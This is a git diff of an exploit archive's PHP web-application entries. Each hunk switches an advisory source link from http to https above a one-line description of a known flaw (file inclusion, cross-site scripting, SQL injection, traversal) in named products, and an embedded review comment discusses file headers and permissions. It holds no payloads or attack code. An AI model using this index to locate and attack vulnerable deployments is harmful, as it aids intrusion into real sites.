@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21394/info +source: https://www.securityfocus.com/bid/21394/info FreeQboard is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29217.txt b/exploits/php/webapps/29217.txt index e8a508924..aade50419 100644 --- a/exploits/php/webapps/29217.txt +++ b/exploits/php/webapps/29217.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21403/info +source: https://www.securityfocus.com/bid/21403/info CuteNews is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29218.txt b/exploits/php/webapps/29218.txt index 1cfb4c23c..24b175dd8 100644 --- a/exploits/php/webapps/29218.txt +++ b/exploits/php/webapps/29218.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21404/info +source: https://www.securityfocus.com/bid/21404/info PHPNews is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29222.txt b/exploits/php/webapps/29222.txt index b780d8b84..a39a8c392 100644 --- a/exploits/php/webapps/29222.txt +++ b/exploits/php/webapps/29222.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21423/info +source: https://www.securityfocus.com/bid/21423/info Cerberus Helpdesk is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29223.txt b/exploits/php/webapps/29223.txt index 94fa1246e..4925f387c 100644 --- a/exploits/php/webapps/29223.txt +++ b/exploits/php/webapps/29223.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21424/info +source: https://www.securityfocus.com/bid/21424/info Inside Systems Mail is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29225.txt b/exploits/php/webapps/29225.txt index 1f31fe206..0f8728a00 100644 --- a/exploits/php/webapps/29225.txt +++ b/exploits/php/webapps/29225.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21427/info +source: https://www.securityfocus.com/bid/21427/info Mobile is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29226.txt b/exploits/php/webapps/29226.txt index d56169123..0bb291904 100644 --- a/exploits/php/webapps/29226.txt +++ b/exploits/php/webapps/29226.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21427/info +source: https://www.securityfocus.com/bid/21427/info Mobile is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29232.txt b/exploits/php/webapps/29232.txt index ac6c17895..f445b83c0 100644 --- a/exploits/php/webapps/29232.txt +++ b/exploits/php/webapps/29232.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21464/info +source: https://www.securityfocus.com/bid/21464/info Link CMS is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29233.txt b/exploits/php/webapps/29233.txt index 40505dc50..ed732d378 100644 --- a/exploits/php/webapps/29233.txt +++ b/exploits/php/webapps/29233.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21464/info +source: https://www.securityfocus.com/bid/21464/info Link CMS is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29237.txt b/exploits/php/webapps/29237.txt index e05c95ede..010c1a8a6 100644 --- a/exploits/php/webapps/29237.txt +++ b/exploits/php/webapps/29237.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21497/info +source: https://www.securityfocus.com/bid/21497/info cPanel BoxTrapper is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29238.txt b/exploits/php/webapps/29238.txt index 4e856be16..78528062b 100644 --- a/exploits/php/webapps/29238.txt +++ b/exploits/php/webapps/29238.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21498/info +source: https://www.securityfocus.com/bid/21498/info Web Hosting Manager is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29242.txt b/exploits/php/webapps/29242.txt index d1026c42b..c4897737c 100644 --- a/exploits/php/webapps/29242.txt +++ b/exploits/php/webapps/29242.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21513/info +source: https://www.securityfocus.com/bid/21513/info Messageriescripthp is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29243.txt b/exploits/php/webapps/29243.txt index 208d488b7..79f1daca8 100644 --- a/exploits/php/webapps/29243.txt +++ b/exploits/php/webapps/29243.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21513/info +source: https://www.securityfocus.com/bid/21513/info Messageriescripthp is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29244.txt b/exploits/php/webapps/29244.txt index b4f9b8e4c..928919a7f 100644 --- a/exploits/php/webapps/29244.txt +++ b/exploits/php/webapps/29244.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21513/info +source: https://www.securityfocus.com/bid/21513/info Messageriescripthp is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29245.txt b/exploits/php/webapps/29245.txt index 0ba8c044e..dfc579335 100644 --- a/exploits/php/webapps/29245.txt +++ b/exploits/php/webapps/29245.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21513/info +source: https://www.securityfocus.com/bid/21513/info Messageriescripthp is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29246.txt b/exploits/php/webapps/29246.txt index 6359ba38d..dcfb00bfe 100644 --- a/exploits/php/webapps/29246.txt +++ b/exploits/php/webapps/29246.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21514/info +source: https://www.securityfocus.com/bid/21514/info AnnonceScriptHP is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29247.txt b/exploits/php/webapps/29247.txt index cc0bc6468..4d2dfb274 100644 --- a/exploits/php/webapps/29247.txt 
+++ b/exploits/php/webapps/29247.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21514/info +source: https://www.securityfocus.com/bid/21514/info AnnonceScriptHP is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29248.txt b/exploits/php/webapps/29248.txt index b908a1e28..ed7c40727 100644 --- a/exploits/php/webapps/29248.txt +++ b/exploits/php/webapps/29248.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21514/info +source: https://www.securityfocus.com/bid/21514/info AnnonceScriptHP is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29249.txt b/exploits/php/webapps/29249.txt index 3c04a8544..ce55a3ab1 100644 --- a/exploits/php/webapps/29249.txt +++ b/exploits/php/webapps/29249.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21514/info +source: https://www.securityfocus.com/bid/21514/info AnnonceScriptHP is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29250.txt b/exploits/php/webapps/29250.txt index 4c35837b2..6a329a07c 100644 --- a/exploits/php/webapps/29250.txt +++ b/exploits/php/webapps/29250.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21514/info +source: https://www.securityfocus.com/bid/21514/info AnnonceScriptHP is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29251.txt b/exploits/php/webapps/29251.txt index 9bfb2d5de..d012812c4 100644 --- a/exploits/php/webapps/29251.txt 
+++ b/exploits/php/webapps/29251.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21514/info +source: https://www.securityfocus.com/bid/21514/info AnnonceScriptHP is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29252.txt b/exploits/php/webapps/29252.txt index 6698e598a..9ba72b085 100644 --- a/exploits/php/webapps/29252.txt +++ b/exploits/php/webapps/29252.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21514/info +source: https://www.securityfocus.com/bid/21514/info AnnonceScriptHP is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29253.txt b/exploits/php/webapps/29253.txt index f1b908584..7447af8cf 100644 --- a/exploits/php/webapps/29253.txt +++ b/exploits/php/webapps/29253.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21514/info +source: https://www.securityfocus.com/bid/21514/info AnnonceScriptHP is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29254.txt b/exploits/php/webapps/29254.txt index f5f12dc12..39a189036 100644 --- a/exploits/php/webapps/29254.txt +++ b/exploits/php/webapps/29254.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21515/info +source: https://www.securityfocus.com/bid/21515/info KDPics is prone to multiple input-validation vulnerabilities, including cross-site scripting and remote file-include issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/29255.txt b/exploits/php/webapps/29255.txt index 052d56424..bbf8abc8a 100644 --- a/exploits/php/webapps/29255.txt 
+++ b/exploits/php/webapps/29255.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21515/info +source: https://www.securityfocus.com/bid/21515/info KDPics is prone to multiple input-validation vulnerabilities, including cross-site scripting and remote file-include issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/29267.txt b/exploits/php/webapps/29267.txt index 1bb007b72..80ba617cd 100644 --- a/exploits/php/webapps/29267.txt +++ b/exploits/php/webapps/29267.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21516/info +source: https://www.securityfocus.com/bid/21516/info ProNews is prone to multiple input-validation vulnerabilities, including multiple HTML-injection issues, an SQL-injection issue, and a cross-site scripting issue, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29268.txt b/exploits/php/webapps/29268.txt index 9cb85745d..817c92549 100644 --- a/exploits/php/webapps/29268.txt +++ b/exploits/php/webapps/29268.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21516/info +source: https://www.securityfocus.com/bid/21516/info ProNews is prone to multiple input-validation vulnerabilities, including multiple HTML-injection issues, an SQL-injection issue, and a cross-site scripting issue, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29269.txt b/exploits/php/webapps/29269.txt index 4121312f6..9e3b02137 100644 --- a/exploits/php/webapps/29269.txt +++ b/exploits/php/webapps/29269.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21516/info +source: https://www.securityfocus.com/bid/21516/info ProNews is prone to multiple input-validation vulnerabilities, including multiple HTML-injection issues, an SQL-injection issue, and a cross-site scripting issue, because the application fails to sufficiently sanitize user-supplied input. 
diff --git a/exploits/php/webapps/29270.txt b/exploits/php/webapps/29270.txt index 03737b358..a93186cfb 100644 --- a/exploits/php/webapps/29270.txt +++ b/exploits/php/webapps/29270.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21520/info +source: https://www.securityfocus.com/bid/21520/info The mxBB profile Control Panel module is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29272.txt b/exploits/php/webapps/29272.txt index 82cc8b26f..29bcd989d 100644 --- a/exploits/php/webapps/29272.txt +++ b/exploits/php/webapps/29272.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21527/info +source: https://www.securityfocus.com/bid/21527/info CMS Made Simple is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29278.pl b/exploits/php/webapps/29278.pl index d1a436004..fc8e8fd94 100755 --- a/exploits/php/webapps/29278.pl +++ b/exploits/php/webapps/29278.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21580/info +source: https://www.securityfocus.com/bid/21580/info WORK system e-commerce is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29282.txt b/exploits/php/webapps/29282.txt index 57591b738..3d93076f2 100644 --- a/exploits/php/webapps/29282.txt +++ b/exploits/php/webapps/29282.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21595/info +source: https://www.securityfocus.com/bid/21595/info GenesisTrader is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues include multiple information-disclosure vulnerabilities, an arbitrary file-upload vulnerability, and multiple cross-site scripting vulnerabilities. 
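Review bot: in the 29278.pl hunk, line 1 of a file carrying mode 100755 is still the bare text `source: https://www.securityfocus.com/bid/21580/info`, followed by the advisory prose as plain file content, so the file opens with neither a shebang nor `#` comments and cannot run as a script as-is. Since line 1 is being rewritten anyway, consider prefixing the header lines with `#`, or dropping the executable bit if the file is meant to be read rather than run. The 29203.php hunk earlier in this patch has the same uncommented `source:` header on line 1, ahead of any `<?php` tag, and would benefit from the same treatment.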
diff --git a/exploits/php/webapps/29283.txt b/exploits/php/webapps/29283.txt index 69cfb15b9..2f67bffd4 100644 --- a/exploits/php/webapps/29283.txt +++ b/exploits/php/webapps/29283.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21595/info +source: https://www.securityfocus.com/bid/21595/info GenesisTrader is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues include multiple information-disclosure vulnerabilities, an arbitrary file-upload vulnerability, and multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/29284.txt b/exploits/php/webapps/29284.txt index 6cb23cd9b..9710dedb3 100644 --- a/exploits/php/webapps/29284.txt +++ b/exploits/php/webapps/29284.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21596/info +source: https://www.securityfocus.com/bid/21596/info Moodle is reported prone to multiple input-validation vulnerabilities, including a cross-site scripting issue and an HTML injection issue, because the application fails to properly sanitize user-supplied input data. diff --git a/exploits/php/webapps/29289.php b/exploits/php/webapps/29289.php index f8b19f1bf..025ed521b 100644 --- a/exploits/php/webapps/29289.php +++ b/exploits/php/webapps/29289.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21621/info +source: https://www.securityfocus.com/bid/21621/info eXtreme-fusion is prone to a local file-include vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29294.html b/exploits/php/webapps/29294.html index 8fe2eeea8..9bdb831c4 100644 --- a/exploits/php/webapps/29294.html +++ b/exploits/php/webapps/29294.html 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21637/info +source: https://www.securityfocus.com/bid/21637/info Knusperleicht Shoutbox is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29298.txt b/exploits/php/webapps/29298.txt index 1617a81c5..324817321 100644 --- a/exploits/php/webapps/29298.txt +++ b/exploits/php/webapps/29298.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21669/info +source: https://www.securityfocus.com/bid/21669/info osTicket Support Cards is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29299.txt b/exploits/php/webapps/29299.txt index fcc8e9306..14569eeae 100644 --- a/exploits/php/webapps/29299.txt +++ b/exploits/php/webapps/29299.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21677/info +source: https://www.securityfocus.com/bid/21677/info Mini Web Shop is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29300.txt b/exploits/php/webapps/29300.txt index 50f185087..ecef90a8d 100644 --- a/exploits/php/webapps/29300.txt +++ b/exploits/php/webapps/29300.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21680/info +source: https://www.securityfocus.com/bid/21680/info TYPO3 is prone to multiple vulnerabilities that allow attackers to execute arbitrary commands. This issue occurs because the application fails to properly sanitize user-supplied data. diff --git a/exploits/php/webapps/29303.txt b/exploits/php/webapps/29303.txt index a289c1581..a410b357d 100644 --- a/exploits/php/webapps/29303.txt +++ b/exploits/php/webapps/29303.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21703/info +source: https://www.securityfocus.com/bid/21703/info PHPBuilder is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29304.txt b/exploits/php/webapps/29304.txt index 11052c268..727cd9ae8 100644 --- a/exploits/php/webapps/29304.txt +++ b/exploits/php/webapps/29304.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21708/info +source: https://www.securityfocus.com/bid/21708/info Calacode @Mail is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29306.txt b/exploits/php/webapps/29306.txt index fa42b8e72..6795d32c7 100644 --- a/exploits/php/webapps/29306.txt +++ b/exploits/php/webapps/29306.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21716/info +source: https://www.securityfocus.com/bid/21716/info The 'a-blog' application is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29308.txt b/exploits/php/webapps/29308.txt index 52691d5b1..88a15e7a6 100644 --- a/exploits/php/webapps/29308.txt +++ b/exploits/php/webapps/29308.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21717/info +source: https://www.securityfocus.com/bid/21717/info Oracle Portal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before returning it to the user. diff --git a/exploits/php/webapps/29311.txt b/exploits/php/webapps/29311.txt index cf448e40f..02cc0383c 100644 --- a/exploits/php/webapps/29311.txt +++ b/exploits/php/webapps/29311.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21719/info +source: https://www.securityfocus.com/bid/21719/info Xt-News is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29313.txt b/exploits/php/webapps/29313.txt index 00bad9494..12e62d30b 100644 --- a/exploits/php/webapps/29313.txt +++ b/exploits/php/webapps/29313.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21719/info +source: https://www.securityfocus.com/bid/21719/info Xt-News is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29314.txt b/exploits/php/webapps/29314.txt index cc7f38e82..0a65e667c 100644 --- a/exploits/php/webapps/29314.txt +++ b/exploits/php/webapps/29314.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21719/info +source: https://www.securityfocus.com/bid/21719/info Xt-News is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29337.txt b/exploits/php/webapps/29337.txt index b1f8168d5..df1601e2c 100644 --- a/exploits/php/webapps/29337.txt +++ b/exploits/php/webapps/29337.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21733/info +source: https://www.securityfocus.com/bid/21733/info TimberWolf is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29338.txt b/exploits/php/webapps/29338.txt index 5e4b62447..cb65916aa 100644 --- a/exploits/php/webapps/29338.txt +++ b/exploits/php/webapps/29338.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21736/info +source: https://www.securityfocus.com/bid/21736/info vBulletin is prone to a vulnerability that may let remote attackers inject arbitrary script code into the application. diff --git a/exploits/php/webapps/29342.txt b/exploits/php/webapps/29342.txt index e8339596a..35b61d4c9 100644 --- a/exploits/php/webapps/29342.txt +++ b/exploits/php/webapps/29342.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21765/info +source: https://www.securityfocus.com/bid/21765/info Multiple remote file-include vulnerabilities affect Luckybot because the application fails to properly sanitize user-supplied input before using it in a PHP 'include()' function call. diff --git a/exploits/php/webapps/29343.txt b/exploits/php/webapps/29343.txt index 0aec723f3..13672ab0e 100644 --- a/exploits/php/webapps/29343.txt +++ b/exploits/php/webapps/29343.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21768/info +source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29344.txt b/exploits/php/webapps/29344.txt index 75f6e3e1e..bec0473ac 100644 --- a/exploits/php/webapps/29344.txt +++ b/exploits/php/webapps/29344.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21768/info +source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29345.txt b/exploits/php/webapps/29345.txt index e676ef35e..023eab952 100644 --- a/exploits/php/webapps/29345.txt +++ b/exploits/php/webapps/29345.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21768/info +source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29346.txt b/exploits/php/webapps/29346.txt index adb88e4a9..a4c4478ea 100644 --- a/exploits/php/webapps/29346.txt +++ b/exploits/php/webapps/29346.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21768/info +source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29347.txt b/exploits/php/webapps/29347.txt index 212cd73c9..02d64b70c 100644 --- a/exploits/php/webapps/29347.txt +++ b/exploits/php/webapps/29347.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21768/info +source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29348.txt b/exploits/php/webapps/29348.txt index d7cfddb45..dc9af7a15 100644 --- a/exploits/php/webapps/29348.txt +++ b/exploits/php/webapps/29348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21768/info +source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29349.txt b/exploits/php/webapps/29349.txt index a316cebca..05b316066 100644 --- a/exploits/php/webapps/29349.txt +++ b/exploits/php/webapps/29349.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21768/info +source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. 
diff --git a/exploits/php/webapps/29350.txt b/exploits/php/webapps/29350.txt index 3829cd8ba..4fcbbd9bb 100644 --- a/exploits/php/webapps/29350.txt +++ b/exploits/php/webapps/29350.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21768/info +source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29351.txt b/exploits/php/webapps/29351.txt index 152a09493..c8a8ca826 100644 --- a/exploits/php/webapps/29351.txt +++ b/exploits/php/webapps/29351.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21768/info +source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29352.txt b/exploits/php/webapps/29352.txt index 607d0e919..0c854e7ce 100644 --- a/exploits/php/webapps/29352.txt +++ b/exploits/php/webapps/29352.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21768/info +source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29356.txt b/exploits/php/webapps/29356.txt index 7f6c34cbb..33ed78499 100644 --- a/exploits/php/webapps/29356.txt +++ b/exploits/php/webapps/29356.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21782/info +source: https://www.securityfocus.com/bid/21782/info Wordpress is prone to an HTML-injection scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29363.txt b/exploits/php/webapps/29363.txt index 10b8c89c7..4a4879d09 100644 --- a/exploits/php/webapps/29363.txt +++ b/exploits/php/webapps/29363.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21792/info +source: https://www.securityfocus.com/bid/21792/info PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29364.txt b/exploits/php/webapps/29364.txt index 2f97fe50a..e51ee39bb 100644 --- a/exploits/php/webapps/29364.txt +++ b/exploits/php/webapps/29364.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21792/info +source: https://www.securityfocus.com/bid/21792/info PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29365.txt b/exploits/php/webapps/29365.txt index bac53bb51..3cef06780 100644 --- a/exploits/php/webapps/29365.txt +++ b/exploits/php/webapps/29365.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21792/info +source: https://www.securityfocus.com/bid/21792/info PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29366.txt b/exploits/php/webapps/29366.txt index 0b23e028d..05c68f096 100644 --- a/exploits/php/webapps/29366.txt +++ b/exploits/php/webapps/29366.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21792/info +source: https://www.securityfocus.com/bid/21792/info PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29367.txt b/exploits/php/webapps/29367.txt index a2ad41055..a227b0eb1 100644 --- a/exploits/php/webapps/29367.txt +++ b/exploits/php/webapps/29367.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21792/info +source: https://www.securityfocus.com/bid/21792/info PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29368.txt b/exploits/php/webapps/29368.txt index 2d6f97a5f..9905bd6ae 100644 --- a/exploits/php/webapps/29368.txt +++ b/exploits/php/webapps/29368.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21792/info +source: https://www.securityfocus.com/bid/21792/info PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29369.txt b/exploits/php/webapps/29369.txt index 1cbac9e14..e50231f41 100644 --- a/exploits/php/webapps/29369.txt +++ b/exploits/php/webapps/29369.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21792/info +source: https://www.securityfocus.com/bid/21792/info PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29370.txt b/exploits/php/webapps/29370.txt index 7250ffbdb..9508204f2 100644 --- a/exploits/php/webapps/29370.txt +++ b/exploits/php/webapps/29370.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21792/info +source: https://www.securityfocus.com/bid/21792/info PHP icalendar is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29372.txt b/exploits/php/webapps/29372.txt index 25c6b9e7b..fbe351276 100644 --- a/exploits/php/webapps/29372.txt +++ b/exploits/php/webapps/29372.txt 
